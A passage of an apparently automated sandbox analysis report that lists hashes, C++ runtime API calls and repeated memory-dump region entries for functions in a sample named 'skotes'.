                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9bb44c32140f3f79d2b24d5d3019494d0feef5c8bc7af3113320fddeac7fc66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7319071A001468BCB14DFA9C8416ADB7F4EF49310F2481BAE465F7351DB74DE02CBA4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _SpinWait.LIBCONCRT ref: 00BEEEBC
                                                                                                                                                                                                                                              • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00BEEEC8
                                                                                                                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BEEEE1
                                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BEEF0F
                                                                                                                                                                                                                                              • Concurrency::Context::Block.LIBCONCRT ref: 00BEEF31
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1182035702-0
                                                                                                                                                                                                                                              • Opcode ID: 6b5473dbc975a71ab4095bfe1f6e8805745a141b8efd8389d5c35efcee9544d0
                                                                                                                                                                                                                                              • Instruction ID: 263c26151e0497e3e81ecb8502d0a023b76867796e80f826fa81a92d51d17dc2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b5473dbc975a71ab4095bfe1f6e8805745a141b8efd8389d5c35efcee9544d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A218170C10299CAEF24EFA5C8456EEB7F0FF14321F2009AEE161A61D1E7B1DA44CB95
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00C01B57
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C01B66
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C01C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                              • String ID: pContext$switchState
                                                                                                                                                                                                                                              • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                              • Opcode ID: b6865b66e864a21e97aa2864955645788825d225e5a0b1f4e3329ada4171ef12
                                                                                                                                                                                                                                              • Instruction ID: d8cb4b42efb6dec70c2d021fdba2ae8145dac81c3ea118ba9d2b6d9dada21a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6865b66e864a21e97aa2864955645788825d225e5a0b1f4e3329ada4171ef12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C531D675A00214AFCF14EF64C881AADF3B5FF44324F284565ED21972C2EB70EE01DA90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00C04E6D
                                                                                                                                                                                                                                              • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00C04E86
                                                                                                                                                                                                                                              • PMDtoOffset.LIBCMT ref: 00C04EAC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                              • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                              • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                              • Opcode ID: caa97a3fc6fbf16c6e9150566f15c5a7c8bf287df0e627177f3596d78db31fe4
                                                                                                                                                                                                                                              • Instruction ID: a81d44bc8b346fc186be32bab41c8b8e16c6ad8ed9fe09c5646e9c1fc061a0c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caa97a3fc6fbf16c6e9150566f15c5a7c8bf287df0e627177f3596d78db31fe4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9121C9B2A04215AFCF18DF69DD46EABB7B8FB44724F104169FB20975C0D731EA00D691
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
